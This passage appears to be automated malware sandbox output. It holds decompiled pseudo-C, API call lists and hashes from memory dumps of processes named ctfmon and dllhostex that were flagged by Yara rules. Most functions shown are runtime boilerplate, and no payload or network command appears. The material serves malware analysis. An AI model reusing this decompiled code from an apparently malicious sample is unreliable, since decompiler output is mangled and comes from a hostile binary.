                                                					 *0x985264(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
                                                					 *_t31();
                                                				}
                                                				_pop(_t32);
                                                				return E00970A5D(_v8 ^ _t33, _t32);
                                                			}










                                                APIs
                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00990E80,?,00000001,00990E80,?), ref: 00978049
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: String
                                                • String ID: /LU5/$LCMapStringEx
                                                • API String ID: 2568140703-3279794684
                                                • Opcode ID: 142512fc5f1aa9324d3d40dc61b4b10730b93af27b7d6d03dbe5923128b14278
                                                • Instruction ID: 519803aea35512d6c5a432e851cfe06b48bca9762cabd15278a12e8742746287
                                                • Opcode Fuzzy Hash: 142512fc5f1aa9324d3d40dc61b4b10730b93af27b7d6d03dbe5923128b14278
                                                • Instruction Fuzzy Hash: 8901E932644209FBCF165F90DC06EEE7FA6FF88754F054114FE1869260CB769931AB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 009692A7
                                                • WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,00000001,00000000,00000000), ref: 009692DE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Ioctlsetsockopt
                                                • String ID: /LU5/
                                                • API String ID: 1903391676-937868281
                                                • Opcode ID: d7d0708ddd889998723b23833f98475a608f67ec37dd01e9300a7371ee4d6c57
                                                • Instruction ID: 04451b06483bbb82e75e4cacfe4f4441325ccb321ac2e3a24f63c5252d229ab1
                                                • Opcode Fuzzy Hash: d7d0708ddd889998723b23833f98475a608f67ec37dd01e9300a7371ee4d6c57
                                                • Instruction Fuzzy Hash: B00119B1A50209BFEB10DF50CC45FBEBBB8EB04700F504125BD15F6290DBB06A089BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00979E38,-00000020,00000FA0,00000000,73BCF7E0,00000000,00000000), ref: 00977FC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpin
                                                • String ID: /LU5/$InitializeCriticalSectionEx
                                                • API String ID: 2593887523-2248632019
                                                • Opcode ID: 21acc3358e245e52ea8fb1735ed3f0ca047786d3a93a0ede9b4cc2cd2133a40d
                                                • Instruction ID: cb6b028c59df4d82047079d854046eb273fa8b86d3c8afec3251434c343b746f
                                                • Opcode Fuzzy Hash: 21acc3358e245e52ea8fb1735ed3f0ca047786d3a93a0ede9b4cc2cd2133a40d
                                                • Instruction Fuzzy Hash: 84F05E32649218FBCB156F90DC06EAEBFA5EF88721F418064FC199A360DA719910ABD4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Alloc
                                                • String ID: /LU5/$FlsAlloc
                                                • API String ID: 2773662609-3169845777
                                                • Opcode ID: 66eb1a2f4238fbbede0ab03bb6eff2c2a994202ca76ceb4e698de13e5cc4fe38
                                                • Instruction ID: d80aae0f146eeaaede328b445c385045c570457e19f42896d58051e3073525d2
                                                • Opcode Fuzzy Hash: 66eb1a2f4238fbbede0ab03bb6eff2c2a994202ca76ceb4e698de13e5cc4fe38
                                                • Instruction Fuzzy Hash: 21E0E532A49318EBC3157BA09C06A6EBF94EF84B14B014159FC0A9A350DE714D0497C5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Free
                                                • String ID: /LU5/$FlsFree
                                                • API String ID: 3978063606-596877152
                                                • Opcode ID: 8c13fb25c9cb428ae7160717bea56bfb6848dfa5d32bea1aa6a6e78924c007e6
                                                • Instruction ID: 670ad0506298a22f4d3a36c6cd3b1f12f1d9995d9f879be08edf5d9d15c549a4
                                                • Opcode Fuzzy Hash: 8c13fb25c9cb428ae7160717bea56bfb6848dfa5d32bea1aa6a6e78924c007e6
                                                • Instruction Fuzzy Hash: A9E0E532A48318EBC310BFA09C46E2EBFE4DF88B15B054158F9095B350DE314D00A7D5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 56%
                                                			E01344380(char* __ecx, intOrPtr* __edx, void* __esi) {
                                                				signed int _v12;
                                                				signed int _v28;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __ebp;
                                                				long _t19;
                                                				long _t21;
                                                				long _t23;
                                                				void* _t27;
                                                				int _t33;
                                                				int _t39;
                                                				void* _t40;
                                                				long _t47;
                                                				void* _t49;
                                                				char* _t56;
                                                				signed int _t58;
                                                				void* _t60;
                                                				void* _t63;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t69;
                                                				void* _t74;
                                                
                                                				_t56 = __ecx;
                                                				_t69 = __edx;
                                                				if( *__ecx != 0) {
                                                					L5:
                                                					return _t19;
                                                				} else {
                                                					_t63 = CreateEventA(0, 1, 0, 0);
                                                					if(_t63 == 0) {
                                                						_t21 = GetLastError();
                                                						_t53 = "CreateEvent";
                                                						_t47 = _t21;
                                                						E013488E0(_t40, _t47, "CreateEvent", _t56, _t63);
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						_t23 = TlsAlloc();
                                                						 *0x13d5b94 = _t23;
                                                						__eflags = _t23 - 0xffffffff;
                                                						if(_t23 == 0xffffffff) {
                                                							__eflags = E01368644();
                                                							if(__eflags != 0) {
                                                								E01368694(_t40, "CreateEvent", _t56, _t63, __eflags);
                                                								_t47 = 0x16;
                                                							}
                                                							__eflags =  *0x13cc1e8 & 0x00000002;
                                                							if(( *0x13cc1e8 & 0x00000002) != 0) {
                                                								_t33 = IsProcessorFeaturePresent(0x17);
                                                								__eflags = _t33;
                                                								if(_t33 != 0) {
                                                									_t47 = 7;
                                                									asm("int 0x29");
                                                								}
                                                								E0135B5DC(_t40, _t53, _t56, _t63, 3, 0x40000015, 1);
                                                								_t74 = _t74 + 0xc;
                                                							}
                                                							E0136336A(3);
                                                							asm("int3");
                                                							_push(_t69);
                                                							_push(_t47);
                                                							_push(_t47);
                                                							_push(_t40);
                                                							_t58 = E01366CCA(_t47, 0x40, 0x30);
                                                							_v28 = _t58;
                                                							_t49 = _t56;
                                                							__eflags = _t58;
                                                							if(_t58 != 0) {
                                                								_t5 = _t58 + 0xc00; // 0xc00
                                                								_t27 = _t5;
                                                								__eflags = _t58 - _t27;
                                                								if(__eflags != 0) {
                                                									_push(_t63);
                                                									_t6 = _t58 + 0x20; // 0x20
                                                									_t64 = _t6;
                                                									_t60 = _t27;
                                                									do {
                                                										_t7 = _t64 - 0x20; // 0x0
                                                										E01367456(_t49, __eflags, _t7, 0xfa0, 0);
                                                										 *(_t64 - 8) =  *(_t64 - 8) | 0xffffffff;
                                                										 *_t64 = 0;
                                                										_t64 = _t64 + 0x30;
                                                										 *((intOrPtr*)(_t64 - 0x2c)) = 0;
                                                										 *((intOrPtr*)(_t64 - 0x28)) = 0xa0a0000;
                                                										 *((char*)(_t64 - 0x24)) = 0xa;
                                                										 *(_t64 - 0x23) =  *(_t64 - 0x23) & 0x000000f8;
                                                										 *((char*)(_t64 - 0x22)) = 0;
                                                										__eflags = _t64 - 0x20 - _t60;
                                                									} while (__eflags != 0);
                                                									_t58 = _v12;
                                                								}
                                                							} else {
                                                								_t58 = 0;
                                                							}
                                                							E013656E2(0);
                                                							return _t58;
                                                						} else {
                                                							return _t23;
                                                						}
                                                					} else {
                                                						_push(_t40);
                                                						asm("lock cmpxchg [ecx], edx");
                                                						if(0 != 0) {
                                                							CloseHandle(_t63);
                                                							_t19 = WaitForSingleObject(0, 0xffffffff);
                                                							goto L5;
                                                						} else {
                                                							 *_t69(); // executed
                                                							_t39 = SetEvent(_t63);
                                                							 *_t56 = 1;
                                                							return _t39;
                                                						}
                                                					}
                                                				}
                                                			}

























                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,01348023), ref: 01344394
                                                • SetEvent.KERNEL32(00000000,?,?,?,?,01348023), ref: 013443B5
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,01348023), ref: 013443C4
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,01348023), ref: 013443CD
                                                • GetLastError.KERNEL32(?,?,?,01348023), ref: 013443D8
                                                • TlsAlloc.KERNEL32(?,?,?,01348023), ref: 013443F0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Event$AllocCloseCreateErrorHandleLastObjectSingleWait
                                                • String ID: CreateEvent
                                                • API String ID: 3340787615-2692171526
                                                • Opcode ID: e13c49cca3caf5294cd1cd0198185ffb943e134b74fa2e073b50c7dc2b29a30e
                                                • Instruction ID: 0f004868c124cdbf60e68c3f5a3290b8b1292750f8c1689dd8faaeaa7231bdc3
                                                • Opcode Fuzzy Hash: e13c49cca3caf5294cd1cd0198185ffb943e134b74fa2e073b50c7dc2b29a30e
                                                • Instruction Fuzzy Hash: 0B2147723443126BF725266DBC4AF567B8CDB95B3DF200139FB09C61C4EEA194018260
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 38 1366f26-1366f32 39 1366fd8-1366fdb 38->39 40 1366f37-1366f47 39->40 41 1366fe1 39->41 42 1366f54-1366f6d LoadLibraryExW 40->42 43 1366f49-1366f4c 40->43 44 1366fe3-1366fe9 41->44 47 1366fbf-1366fc8 42->47 48 1366f6f-1366f78 GetLastError 42->48 45 1366fd5 43->45 46 1366f52 43->46 45->39 49 1366fd1-1366fd3 46->49 47->49 52 1366fca-1366fcb FreeLibrary 47->52 50 1366faf 48->50 51 1366f7a-1366f8c call 1360d63 48->51 49->45 53 1366fea-1366fec 49->53 55 1366fb1-1366fb3 50->55 51->50 58 1366f8e-1366fa0 call 1360d63 51->58 52->49 53->44 55->47 57 1366fb5-1366fbd 55->57 57->45 58->50 61 1366fa2-1366fad LoadLibraryExW 58->61 61->55
                                                C-Code - Quality: 100%
                                                			E01366F26(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                				signed int* _v8;
                                                				void** _t12;
                                                				void* _t13;
                                                				void* _t16;
                                                				void* _t18;
                                                				signed int _t22;
                                                				WCHAR* _t23;
                                                				void** _t26;
                                                				signed int* _t29;
                                                				void* _t32;
                                                				void* _t34;
                                                
                                                				_t29 = _a4;
                                                				while(_t29 != _a8) {
                                                					_t22 =  *_t29;
                                                					_t12 = 0x13d5480 + _t22 * 4;
                                                					_t32 =  *_t12;
                                                					_v8 = _t12;
                                                					if(_t32 == 0) {
                                                						_t23 =  *(0x13b3c00 + _t22 * 4);
                                                						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
                                                						_t32 = _t13;
                                                						if(_t32 != 0) {
                                                							L12:
                                                							_t26 = _v8;
                                                							 *_t26 = _t32;
                                                							if( *_t26 != 0) {
                                                								FreeLibrary(_t32);
                                                							}
                                                							L14:
                                                							if(_t32 != 0) {
                                                								_t16 = _t32;
                                                								L18:
                                                								return _t16;
                                                							}
                                                							L15:
                                                							_t29 =  &(_t29[1]);
                                                							continue;
                                                						}
                                                						_t18 = GetLastError();
                                                						if(_t18 != 0x57) {
                                                							L9:
                                                							_t32 = 0;
                                                							L10:
                                                							if(_t32 != 0) {
                                                								goto L12;
                                                							}
                                                							 *_v8 = _t18 | 0xffffffff;
                                                							goto L15;
                                                						}
                                                						_t18 = E01360D63(_t23, L"api-ms-", 7);
                                                						_t34 = _t34 + 0xc;
                                                						if(_t18 == 0) {
                                                							goto L9;
                                                						}
                                                						_t18 = E01360D63(_t23, L"ext-ms-", 7);
                                                						_t34 = _t34 + 0xc;
                                                						if(_t18 == 0) {
                                                							goto L9;
                                                						}
                                                						_t18 = LoadLibraryExW(_t23, _t32, _t32);
                                                						_t32 = _t18;
                                                						goto L10;
                                                					}
                                                					if(_t32 == 0xffffffff) {
                                                						goto L15;
                                                					}
                                                					goto L14;
                                                				}
                                                				_t16 = 0;
                                                				goto L18;
                                                			}















                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 0-537541572
                                                • Opcode ID: 3329a7f1965926b8e1005082e71ada5e7cd7babd20a57bc9b2dbd793d5dce337
                                                • Instruction ID: e70ec12ed09fbf73162ef300d05ee0f3a637bb1429feea395a74597acfb06e4b
                                                • Opcode Fuzzy Hash: 3329a7f1965926b8e1005082e71ada5e7cd7babd20a57bc9b2dbd793d5dce337
                                                • Instruction Fuzzy Hash: 0E212BB2A01225EBDB329A299C92E5E7B6CDF417E8F944120FD05AF389D730EC0487D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 78%
                                                			E01365D22(void* __ecx, void* __edx) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t2;
                                                				void* _t3;
                                                				intOrPtr _t5;
                                                				void* _t6;
                                                				intOrPtr _t9;
                                                				void* _t10;
                                                				void* _t30;
                                                				void* _t39;
                                                				void* _t40;
                                                				void* _t43;
                                                				void* _t45;
                                                				void* _t49;
                                                				long _t51;
                                                				long _t52;
                                                				void* _t55;
                                                				void* _t57;
                                                				void* _t60;
                                                
                                                				_t49 = __edx;
                                                				_t43 = __ecx;
                                                				_push(_t55);
                                                				_t51 = GetLastError();
                                                				_t2 =  *0x13cc370; // 0x6
                                                				_t62 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L5:
                                                					_t3 = E013672FE(_t43, __eflags, _t2, 0xffffffff);
                                                					__eflags = _t3;
                                                					if(_t3 == 0) {
                                                						goto L3;
                                                					} else {
                                                						_t30 = E01366CCA(_t43, 1, 0x364); // executed
                                                						_t55 = _t30;
                                                						_pop(_t43);
                                                						__eflags = _t55;
                                                						if(__eflags != 0) {
                                                							__eflags = E013672FE(_t43, __eflags,  *0x13cc370, _t55);
                                                							if(__eflags != 0) {
                                                								E01365B4C(_t55, _t55, 0x13d5274);
                                                								E013656E2(0);
                                                								_t60 = _t60 + 0xc;
                                                								_t39 = _t55;
                                                							} else {
                                                								_t39 = 0;
                                                								E013672FE(_t43, __eflags,  *0x13cc370, 0);
                                                								_push(_t55);
                                                								goto L8;
                                                							}
                                                						} else {
                                                							_t39 = 0;
                                                							__eflags = 0;
                                                							E013672FE(_t43, 0,  *0x13cc370, 0);
                                                							_push(0);
                                                							L8:
                                                							E013656E2();
                                                							_pop(_t43);
                                                						}
                                                					}
                                                				} else {
                                                					_t39 = E013672A8(_t43, _t62, _t2);
                                                					if(_t39 == 0) {
                                                						_t2 =  *0x13cc370; // 0x6
                                                						goto L5;
                                                					} else {
                                                						if(_t39 == 0xffffffff) {
                                                							L3:
                                                							_t39 = 0;
                                                						}
                                                					}
                                                				}
                                                				SetLastError(_t51);
                                                				if(_t39 == 0) {
                                                					E0135EBB9(_t39, _t43, _t49, _t51, _t55);
                                                					asm("int3");
                                                					_t5 =  *0x13cc370; // 0x6
                                                					_push(_t55);
                                                					__eflags = _t5 - 0xffffffff;
                                                					if(__eflags == 0) {
                                                						L20:
                                                						_t6 = E013672FE(_t43, __eflags, _t5, 0xffffffff);
                                                						__eflags = _t6;
                                                						if(_t6 == 0) {
                                                							goto L29;
                                                						} else {
                                                							_t55 = E01366CCA(_t43, 1, 0x364);
                                                							_pop(_t43);
                                                							__eflags = _t55;
                                                							if(__eflags != 0) {
                                                								__eflags = E013672FE(_t43, __eflags,  *0x13cc370, _t55);
                                                								if(__eflags != 0) {
                                                									E01365B4C(_t55, _t55, 0x13d5274);
                                                									E013656E2(0);
                                                									_t60 = _t60 + 0xc;
                                                									goto L27;
                                                								} else {
                                                									E013672FE(_t43, __eflags,  *0x13cc370, _t21);
                                                									_push(_t55);
                                                									goto L23;
                                                								}
                                                							} else {
                                                								E013672FE(_t43, __eflags,  *0x13cc370, _t20);
                                                								_push(_t55);
                                                								L23:
                                                								E013656E2();
                                                								_pop(_t43);
                                                								goto L29;
                                                							}
                                                						}
                                                					} else {
                                                						_t55 = E013672A8(_t43, __eflags, _t5);
                                                						__eflags = _t55;
                                                						if(__eflags == 0) {
                                                							_t5 =  *0x13cc370; // 0x6
                                                							goto L20;
                                                						} else {
                                                							__eflags = _t55 - 0xffffffff;
                                                							if(_t55 == 0xffffffff) {
                                                								L29:
                                                								E0135EBB9(_t39, _t43, _t49, _t51, _t55);
                                                								asm("int3");
                                                								_push(_t39);
                                                								_push(_t55);
                                                								_push(_t51);
                                                								_t52 = GetLastError();
                                                								_t9 =  *0x13cc370; // 0x6
                                                								__eflags = _t9 - 0xffffffff;
                                                								if(__eflags == 0) {
                                                									L35:
                                                									_t10 = E013672FE(_t43, __eflags, _t9, 0xffffffff);
                                                									__eflags = _t10;
                                                									if(_t10 == 0) {
                                                										goto L33;
                                                									} else {
                                                										_t57 = E01366CCA(_t43, 1, 0x364);
                                                										_pop(_t45);
                                                										__eflags = _t57;
                                                										if(__eflags != 0) {
                                                											__eflags = E013672FE(_t45, __eflags,  *0x13cc370, _t57);
                                                											if(__eflags != 0) {
                                                												E01365B4C(_t57, _t57, 0x13d5274);
                                                												E013656E2(0);
                                                												_t40 = _t57;
                                                											} else {
                                                												_t40 = 0;
                                                												E013672FE(_t45, __eflags,  *0x13cc370, 0);
                                                												_push(_t57);
                                                												goto L38;
                                                											}
                                                										} else {
                                                											_t40 = 0;
                                                											__eflags = 0;
                                                											E013672FE(_t45, 0,  *0x13cc370, 0);
                                                											_push(0);
                                                											L38:
                                                											E013656E2();
                                                										}
                                                									}
                                                								} else {
                                                									_t40 = E013672A8(_t43, __eflags, _t9);
                                                									__eflags = _t40;
                                                									if(__eflags == 0) {
                                                										_t9 =  *0x13cc370; // 0x6
                                                										goto L35;
                                                									} else {
                                                										__eflags = _t40 - 0xffffffff;
                                                										if(_t40 == 0xffffffff) {
                                                											L33:
                                                											_t40 = 0;
                                                										}
                                                									}
                                                								}
                                                								SetLastError(_t52);
                                                								return _t40;
                                                							} else {
                                                								L27:
                                                								__eflags = _t55;
                                                								if(_t55 == 0) {
                                                									goto L29;
                                                								} else {
                                                									return _t55;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					return _t39;
                                                				}
                                                			}

                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,01360DC2,013C8258,00000010), ref: 01365D27
                                                • _free.LIBCMT ref: 01365D82
                                                • _free.LIBCMT ref: 01365DB8
                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01360DC2,013C8258,00000010), ref: 01365DC3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 3d5e6344d5482c2de29cea2a1298efe7dd393ac63002a0dcaa2d3af978f01760
                                                • Instruction ID: d3d4c268cf4c4e67e4c8720d6a4bfe827b5c63cb699a7b519092acc2b7bbd9a2
                                                • Opcode Fuzzy Hash: 3d5e6344d5482c2de29cea2a1298efe7dd393ac63002a0dcaa2d3af978f01760
                                                • Instruction Fuzzy Hash: DF11C4316442077FE6222ABDACC8E2B365DEB627FCB60D235F614961DCDA588D074760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 86%
                                                			E01360729(void* __ebx, void* __edi, signed int _a4, signed int _a8, signed int _a12) {
                                                				signed int _v8;
                                                				void* _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				long _v24;
                                                				intOrPtr _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				long _v44;
                                                				char _v48;
                                                				void* __esi;
                                                				signed int _t60;
                                                				signed int _t62;
                                                				signed char _t66;
                                                				signed int _t68;
                                                				intOrPtr _t69;
                                                				signed int _t72;
                                                				signed int _t73;
                                                				signed int _t76;
                                                				intOrPtr _t77;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				signed int _t88;
                                                				signed int _t103;
                                                				void* _t104;
                                                				signed int _t107;
                                                				signed int _t109;
                                                				signed int _t115;
                                                				intOrPtr _t116;
                                                				signed int _t117;
                                                				signed int _t119;
                                                				signed int _t124;
                                                				signed int _t125;
                                                				void* _t126;
                                                
                                                				_t60 =  *0x13cc074; // 0x4132269f
                                                				_v8 = _t60 ^ _t125;
                                                				_t107 = _a12;
                                                				_t62 = _a8;
                                                				_v12 = _t62;
                                                				_v24 = _t107;
                                                				_t124 = _a4;
                                                				if(_t107 != 0) {
                                                					__eflags = _t62;
                                                					if(_t62 != 0) {
                                                						_push(__ebx);
                                                						_t115 = _t124 >> 6;
                                                						_push(__edi);
                                                						_t119 = (_t124 & 0x0000003f) * 0x30;
                                                						_v16 = _t115;
                                                						_t116 =  *((intOrPtr*)(0x13d5278 + _t115 * 4));
                                                						_v20 = _t119;
                                                						_t103 =  *((intOrPtr*)(_t116 + _t119 + 0x29));
                                                						__eflags = _t103 - 2;
                                                						if(_t103 == 2) {
                                                							L6:
                                                							_t66 =  !_t107;
                                                							__eflags = _t66 & 0x00000001;
                                                							if((_t66 & 0x00000001) != 0) {
                                                								L8:
                                                								__eflags =  *(_t116 + _t119 + 0x28) & 0x00000020;
                                                								if(__eflags != 0) {
                                                									E0135F4B6(_t124, 0, 0, 2);
                                                									_t126 = _t126 + 0x10;
                                                								}
                                                								asm("stosd");
                                                								asm("stosd");
                                                								asm("stosd");
                                                								_t68 = E013602CF(_t116, __eflags, _t124);
                                                								__eflags = _t68;
                                                								if(_t68 == 0) {
                                                									_t109 = _v16;
                                                									_t117 = _v20;
                                                									_t69 =  *((intOrPtr*)(0x13d5278 + _t109 * 4));
                                                									__eflags =  *((char*)(_t69 + _t117 + 0x28));
                                                									if( *((char*)(_t69 + _t117 + 0x28)) >= 0) {
                                                										_t104 = _v12;
                                                										asm("stosd");
                                                										asm("stosd");
                                                										asm("stosd");
                                                										_t72 = WriteFile( *(_t69 + _t117 + 0x18), _t104, _v24,  &_v44, 0);
                                                										__eflags = _t72;
                                                										if(_t72 == 0) {
                                                											_v48 = GetLastError();
                                                										}
                                                										_t124 =  &_v48;
                                                										goto L27;
                                                									}
                                                									_t104 = _v12;
                                                									_t85 = _t103;
                                                									__eflags = _t85;
                                                									if(_t85 == 0) {
                                                										_t87 = E01360345(_t104,  &_v36,  &_v48, _t124, _t104, _v24); // executed
                                                										goto L16;
                                                									}
                                                									_t88 = _t85 - 1;
                                                									__eflags = _t88;
                                                									if(_t88 == 0) {
                                                										_t87 = E0136050D(_t104,  &_v36,  &_v48, _t124, _t104, _v24);
                                                										goto L16;
                                                									}
                                                									__eflags = _t88 != 1;
                                                									if(_t88 != 1) {
                                                										goto L29;
                                                									}
                                                									_t87 = E01360422(_t104,  &_v36,  &_v48, _t124, _t104, _v24);
                                                									goto L16;
                                                								} else {
                                                									__eflags = _t103;
                                                									if(_t103 == 0) {
                                                										_t104 = _v12;
                                                										_t87 = E01360096(_t104,  &_v36,  &_v48, _t124, _t104, _v24);
                                                										L16:
                                                										L14:
                                                										_t124 = _t87;
                                                										L27:
                                                										asm("movsd");
                                                										asm("movsd");
                                                										asm("movsd");
                                                										L28:
                                                										_t109 = _v16;
                                                										_t117 = _v20;
                                                										L29:
                                                										_t73 = _v32;
                                                										__eflags = _t73;
                                                										if(_t73 != 0) {
                                                											__eflags = _t73 - _v28;
                                                											L40:
                                                											L41:
                                                											return E01353717(_v8 ^ _t125, _t124);
                                                										}
                                                										_t76 = _v36;
                                                										__eflags = _t76;
                                                										if(_t76 == 0) {
                                                											_t77 =  *((intOrPtr*)(0x13d5278 + _t109 * 4));
                                                											__eflags =  *(_t77 + _t117 + 0x28) & 0x00000040;
                                                											if(( *(_t77 + _t117 + 0x28) & 0x00000040) == 0) {
                                                												L37:
                                                												 *((intOrPtr*)(E0135EB5C())) = 0x1c;
                                                												_t79 = E0135EB49();
                                                												 *_t79 =  *_t79 & 0x00000000;
                                                												__eflags =  *_t79;
                                                												L38:
                                                												goto L40;
                                                											}
                                                											__eflags =  *_t104 - 0x1a;
                                                											if( *_t104 != 0x1a) {
                                                												goto L37;
                                                											}
                                                											goto L40;
                                                										}
                                                										_t124 = 5;
                                                										__eflags = _t76 - _t124;
                                                										if(_t76 != _t124) {
                                                											_t79 = E0135EB26(_t76);
                                                										} else {
                                                											 *((intOrPtr*)(E0135EB5C())) = 9;
                                                											 *(E0135EB49()) = _t124;
                                                										}
                                                										goto L38;
                                                									}
                                                									__eflags = _t103 - 1 - 1;
                                                									_t104 = _v12;
                                                									if(_t103 - 1 > 1) {
                                                										goto L28;
                                                									}
                                                									_t87 = E01360265( &_v48, _t104, _v24);
                                                									goto L14;
                                                								}
                                                							}
                                                							 *(E0135EB49()) =  *_t95 & 0x00000000;
                                                							 *((intOrPtr*)(E0135EB5C())) = 0x16;
                                                							_t79 = E0135B7A1();
                                                							goto L38;
                                                						}
                                                						__eflags = _t103 - 1;
                                                						if(_t103 != 1) {
                                                							goto L8;
                                                						}
                                                						goto L6;
                                                					}
                                                					 *(E0135EB49()) =  *_t97 & 0x00000000;
                                                					 *((intOrPtr*)(E0135EB5C())) = 0x16;
                                                					E0135B7A1();
                                                					goto L41;
                                                				}
                                                				goto L41;
                                                			}


                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
